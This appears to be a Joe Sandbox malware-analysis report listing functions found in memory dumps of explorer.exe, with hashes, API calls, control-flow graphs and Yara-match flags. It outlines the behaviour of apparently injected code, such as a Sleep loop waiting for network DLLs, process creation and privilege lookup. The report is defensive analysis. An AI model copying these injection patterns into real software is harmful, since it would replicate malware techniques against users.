                                  • Opcode ID: 3539998f3dd9bc01aacca39754a86cd6a87c685ab5adb639c289e3f60578aeb9
                                  • Instruction ID: 95efc1c94ec426aeff60f4ca6ca9fcbee4abad990542157be4a3b9269b2ed3d0
                                  • Opcode Fuzzy Hash: 3539998f3dd9bc01aacca39754a86cd6a87c685ab5adb639c289e3f60578aeb9
                                  • Instruction Fuzzy Hash: 909002A124200003410571594454616406AA7E0245B92C021E2004590DC96588917265
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 71fb83c8c7245ef54aba9eb55a8c0937362eec2c457011c3a11aa94126de8c6a
                                  • Instruction ID: c62d4fc3ac0f076a0c7188a9c65d837c81b9d29340a51f031cd0fd75fa7717ad
                                  • Opcode Fuzzy Hash: 71fb83c8c7245ef54aba9eb55a8c0937362eec2c457011c3a11aa94126de8c6a
                                  • Instruction Fuzzy Hash: CA9002A138100442D10061594454B060065E7E1345F92C015E2054554D8A59CC527266
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 77e06e06d2703f4ad4874059bc7e4d16332af5113c17d8ba23b12000b7d9c6a3
                                  • Instruction ID: a84ff1aefa92c7be8531cf3513da0d42deee783276444be4659d17355b364aca
                                  • Opcode Fuzzy Hash: 77e06e06d2703f4ad4874059bc7e4d16332af5113c17d8ba23b12000b7d9c6a3
                                  • Instruction Fuzzy Hash: D1900261282041525545B15944445074066B7E02857D2C012A2404950C89669856F761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 466cc22a572368f982366e93ed88a523f5ab23c6d49fb00f563defb89ed2b3f4
                                  • Instruction ID: 336159949bf489cd21b7b1e15de6161c222143ef385bd60c4ca2e1d5794529ed
                                  • Opcode Fuzzy Hash: 466cc22a572368f982366e93ed88a523f5ab23c6d49fb00f563defb89ed2b3f4
                                  • Instruction Fuzzy Hash: 6490027124100413D111615945447070069A7D0285FD2C412A1414558D9A968952B261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d01eadbc387f1a4fb9bda618ffaea2fc5cb65e82d32a0270fd6411ff3246f9dc
                                  • Instruction ID: 8bce64571c547cfbfcff1414a31ee994f5cbd2beff60dbb4c6cfb2cadbaa00b1
                                  • Opcode Fuzzy Hash: d01eadbc387f1a4fb9bda618ffaea2fc5cb65e82d32a0270fd6411ff3246f9dc
                                  • Instruction Fuzzy Hash: 4290027124100402D100659954486460065A7E0345F92D011A6014555ECAA588917271
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7f6e0dcecf7168d30310db2c3086bb26f36e5ed5d29a93ce171806c3354f6278
                                  • Instruction ID: c702510239fabc198285d63ee9045488ecf07698ccc631bab54803dd01ae3d16
                                  • Opcode Fuzzy Hash: 7f6e0dcecf7168d30310db2c3086bb26f36e5ed5d29a93ce171806c3354f6278
                                  • Instruction Fuzzy Hash: F790027135114402D110615984447060065A7D1245F92C411A1814558D8AD588917262
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: daa4de9a177b440425765744d17eba37968504f8beee3cf688e4616793012957
                                  • Instruction ID: 320480bfe6fd128fadf20b1c184ee2f8039c9894746cc1eabb2dd8de9540223e
                                  • Opcode Fuzzy Hash: daa4de9a177b440425765744d17eba37968504f8beee3cf688e4616793012957
                                  • Instruction Fuzzy Hash: 4090026925300002D1807159544860A0065A7D1246FD2D415A1005558CCD5588697361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 18f42c9bbcbde457f929586062dd4a5643904c3a842ac23a6ce3e1d20626ff1e
                                  • Instruction ID: 9d97f6b681f389b39b98be6dea7474cdbd92b999450e307a94d4ea9c9d0fb7a5
                                  • Opcode Fuzzy Hash: 18f42c9bbcbde457f929586062dd4a5643904c3a842ac23a6ce3e1d20626ff1e
                                  • Instruction Fuzzy Hash: FE90027124504842D14071594444A460075A7D0349F92C011A1054694D9A658D55B7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 77eff9e6c8f7f6a9ab7340f1cbc7c1020f668aef1e841a9f1dfd4bd9a243e603
                                  • Instruction ID: 6bfeed5eb1fd113b1cc7f3247609af5c25bc2a9ff000b960529b8f2446ad0742
                                  • Opcode Fuzzy Hash: 77eff9e6c8f7f6a9ab7340f1cbc7c1020f668aef1e841a9f1dfd4bd9a243e603
                                  • Instruction Fuzzy Hash: A290026125180042D20065694C54B070065A7D0347F92C115A1144554CCD5588617661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2297a4b4a97f2254227aadb10c2c3945b29d142b638c14716106c91230d04a3c
                                  • Instruction ID: 962f1c62a197713b9ec9bbd49c0837da1ec0a9087b655b544be057e5ddae6e4f
                                  • Opcode Fuzzy Hash: 2297a4b4a97f2254227aadb10c2c3945b29d142b638c14716106c91230d04a3c
                                  • Instruction Fuzzy Hash: 3990027124100802D1807159444464A0065A7D1345FD2C015A1015654DCE558A5977E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b733c8786c55e277a5a460ec38c42283273e8c27bae56e86fcac1ee6124812a7
                                  • Instruction ID: e23c4e01924652c11d0650fcf76725cd43167273efa54d4592a6100b1b503bde
                                  • Opcode Fuzzy Hash: b733c8786c55e277a5a460ec38c42283273e8c27bae56e86fcac1ee6124812a7
                                  • Instruction Fuzzy Hash: 0590027124100842D10061594444B460065A7E0345F92C016A1114654D8A55C8517661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a7365c4f1c4dc9d68a09ff5bc094691ac27bb0dcfb937049d70df54e496a776e
                                  • Instruction ID: 4b228176f7fc362183fb2806146ac6e1855cbf22d4b4478b75d8fe3236f1c13c
                                  • Opcode Fuzzy Hash: a7365c4f1c4dc9d68a09ff5bc094691ac27bb0dcfb937049d70df54e496a776e
                                  • Instruction Fuzzy Hash: F190027124108802D1106159844474A0065A7D0345F96C411A5414658D8AD588917261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 297 3359050-3359092 call 335be80 300 335916c-3359172 297->300 301 3359098-33590e8 call 335bf50 call 334a150 call 3355ab0 297->301 308 33590f0-3359101 Sleep 301->308 309 3359166-335916a 308->309 310 3359103-3359109 308->310 309->300 309->308 311 3359133-3359154 call 3358e80 310->311 312 335910b-3359131 call 3358c80 310->312 316 3359159-335915c 311->316 312->316 316->309
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 033590F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: a1855401b72546f3e880546eeee3fbe473be9dd567a25bc82194df3d6c6e9085
                                  • Instruction ID: 6bebc4228076ba5c1ee0a260094904a93afe4529995ff3b929ccf9815d5719c7
                                  • Opcode Fuzzy Hash: a1855401b72546f3e880546eeee3fbe473be9dd567a25bc82194df3d6c6e9085
                                  • Instruction Fuzzy Hash: 97314CB6A02704ABD711DFA4C8E4FA7B7B8AF88700F04851DFA1A9B641D770B545CBE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 317 335904a-335907f 318 335908b-3359092 317->318 319 3359086 call 335be80 317->319 320 335916c-3359172 318->320 321 3359098-33590e8 call 335bf50 call 334a150 call 3355ab0 318->321 319->318 328 33590f0-3359101 Sleep 321->328 329 3359166-335916a 328->329 330 3359103-3359109 328->330 329->320 329->328 331 3359133-3359154 call 3358e80 330->331 332 335910b-3359131 call 3358c80 330->332 336 3359159-335915c 331->336 332->336 336->329
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 033590F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 1b8a03cecd2825b960372d68d94477a51407f427788c66702c3215f611f1517c
                                  • Instruction ID: 2aab405d9c58a10913d3f8f8cab21179e1c00ae0ba0213543532c4b17bf34ec5
                                  • Opcode Fuzzy Hash: 1b8a03cecd2825b960372d68d94477a51407f427788c66702c3215f611f1517c
                                  • Instruction Fuzzy Hash: C3219CB2A02700ABD711DF64C8D4FABB7B8AF48700F048169FA1A9F641D770B545CBD0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 337 3347688-334769f 338 33476a8-33476da call 335cb80 call 334a150 call 3355ab0 337->338 339 33476a3 call 335bfa0 337->339 346 33476dc-33476ee PostThreadMessageW 338->346 347 334770e-3347712 338->347 339->338 348 33476f0-334770b call 33498b0 PostThreadMessageW 346->348 349 334770d 346->349 348->349 349->347
                                  APIs
                                  • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 033476EA
                                  • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 0334770B
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 7f0981197140a184472aac8e09b762b5859d5e3b1544a3456ca15260a6c29bf9
                                  • Instruction ID: 4d8cb30b547a1a8f5c0a25955a120884bf8c0ba9248ec2d3cc7a01697b3a67e1
                                  • Opcode Fuzzy Hash: 7f0981197140a184472aac8e09b762b5859d5e3b1544a3456ca15260a6c29bf9
                                  • Instruction Fuzzy Hash: 3501B531E80328B6FB21E7A49C82FFE776CAB04A50F140119FF04BE2C0D794790546E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 033476EA
                                  • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 0334770B
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: ef16a62fc603ddb454445da7c93e7426b2ed5a17266dabc1fb6382bb2acf3ceb
                                  • Instruction ID: f1dab59c726ec3ba6c0053d541c8768a1f9ce005f44f16f18ca6f1a05b8e0afe
                                  • Opcode Fuzzy Hash: ef16a62fc603ddb454445da7c93e7426b2ed5a17266dabc1fb6382bb2acf3ceb
                                  • Instruction Fuzzy Hash: 3701A731E8032876F721E7A49C82FBE776C6B00A51F044114FF04BE2C0E694790647E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 562 335a6b0-335a708 call 335af80 CreateProcessInternalW
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 0335A704
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                  • Instruction ID: 6441f1cfb29adf99cb056d82ed4a9a34bcda3fb672f47751a247c5ad41301d39
                                  • Opcode Fuzzy Hash: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                  • Instruction Fuzzy Hash: 2B01B2B2210208BFCB54DF89DC80EEB77ADAF8C754F118258FA0D97240C630E851CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 571 3359173-33591a8 call 3355ab0 574 33591c7-33591cc 571->574 575 33591aa-33591c6 call 335f38f CreateThread 571->575
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0334D300,?,?), ref: 033591BC
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: d069588e36421dc637220a221e52b2108308b26e1938ae63aada22056f3d1bb2
                                  • Instruction ID: 64912243c9b6dac0f4a822c89ffd788ceae481f7cbd17e9bd5a0d26096007ffb
                                  • Opcode Fuzzy Hash: d069588e36421dc637220a221e52b2108308b26e1938ae63aada22056f3d1bb2
                                  • Instruction Fuzzy Hash: B8F02B7669535037E321A168CC82FE37BCCCFA6B60F580199FA49EF2C2D9D5F84142A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 578 3359180-335919b 579 33591a1-33591a8 578->579 580 335919c call 3355ab0 578->580 581 33591c7-33591cc 579->581 582 33591aa-33591c6 call 335f38f CreateThread 579->582 580->579
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0334D300,?,?), ref: 033591BC
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 46180d9b45e292b8c101f92b0242505f7bbb86431d1965c9222a167fa6db4999
                                  • Instruction ID: ade23bba1bdc700b73530de9751fd8daa879f82b74a0b830b542203bdfcd2ff9
                                  • Opcode Fuzzy Hash: 46180d9b45e292b8c101f92b0242505f7bbb86431d1965c9222a167fa6db4999
                                  • Instruction Fuzzy Hash: 7DE06D3778131476E320A1A99C42FA7B28C9B85B20F18002AFA0DEA2C1D995F40102E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0335A66D
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 996eb8cf1b5ead288344743b563072885695423d7bdc1c0159015cf4cdffa4e5
                                  • Instruction ID: d92efaa83cd8bb6c30d3278195c10c6d20c29e4a13a46a0700f18b61179dfcfc
                                  • Opcode Fuzzy Hash: 996eb8cf1b5ead288344743b563072885695423d7bdc1c0159015cf4cdffa4e5
                                  • Instruction Fuzzy Hash: 53E06DB62012156BCB14DF58DC48E9B3768AF88760F114604FD295B392C630E911CBB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0334D5D2,0334D5D2,?,00000000,?,?), ref: 0335A7D0
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 05ca4e9c738f4297892b61e5240bdb7a93ca56fe82c474f081956a0b376ed335
                                  • Instruction ID: 0c26e6c6dd60de6d50bab46f589ad3833af4af1dcabd8ed28e8a38d492edbc1e
                                  • Opcode Fuzzy Hash: 05ca4e9c738f4297892b61e5240bdb7a93ca56fe82c474f081956a0b376ed335
                                  • Instruction Fuzzy Hash: 6BE06DB2600215BFCB20DFA5DC95FE77B69AF45210F058168FA49AB252C631A910CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0334D5D2,0334D5D2,?,00000000,?,?), ref: 0335A7D0
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                  • Instruction ID: 9058da442c7129af5f1016faa8483e19378a5564e7e2702790b38b7b60115fa5
                                  • Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                  • Instruction Fuzzy Hash: 41E01AB56002086BDB10DF49CC84EE737ADAF89654F018154FE085B241C530E8148AF1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlAllocateHeap.NTDLL(03355196,?,0335590F,0335590F,?,03355196,?,?,?,?,?,00000000,00000005,00000206), ref: 0335A62D
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                  • Instruction ID: a8daf10b96c508e4c06966b0f48128ec1a64859451d87b5d618dd21eb6f35243
                                  • Opcode Fuzzy Hash: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                  • Instruction Fuzzy Hash: 22E046B5200208ABDB14EF89DC84EAB37ACEF88654F018254FE089B241CA30F910CBF0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0335A66D
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                  • Instruction ID: 2cc3e7db80b33bdf358cd2b6c6a9da9d7e3d42d6a4267ca511e278cfc5f482e7
                                  • Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                  • Instruction Fuzzy Hash: 10E04FB52002046FD714DF49DC48EA737ACEF88750F114154FD085B241C530F910CAF0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlAllocateHeap.NTDLL(03355196,?,0335590F,0335590F,?,03355196,?,?,?,?,?,00000000,00000005,00000206), ref: 0335A62D
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 5e64705faabf0fabb625dd3f05b167d325932560a1e3b18f2a7673a0dc050508
                                  • Instruction ID: f779acda5ed9265f01ab1341981947b5c8223a4592e1d274358567d5136a1e45
                                  • Opcode Fuzzy Hash: 5e64705faabf0fabb625dd3f05b167d325932560a1e3b18f2a7673a0dc050508
                                  • Instruction Fuzzy Hash: 10E086BD10A2845BC701EE649980CA67758AF841183144389FC5D47706D221E42496B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,03348243,?), ref: 0334DA6B
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 1f063cbf4af7d963b495a979882ac7975d7cc23451690843af977cfdb905c931
                                  • Instruction ID: da9c4319139d633501a575bdcac7dc5edde81e7a581a16e847c5392b3f600e1d
                                  • Opcode Fuzzy Hash: 1f063cbf4af7d963b495a979882ac7975d7cc23451690843af977cfdb905c931
                                  • Instruction Fuzzy Hash: 76E0C2B1A583046BFB11D7E98CD6F6277EC9B45A10F0944A8FA8AAA3C3D955F1008764
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,03348243,?), ref: 0334DA6B
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
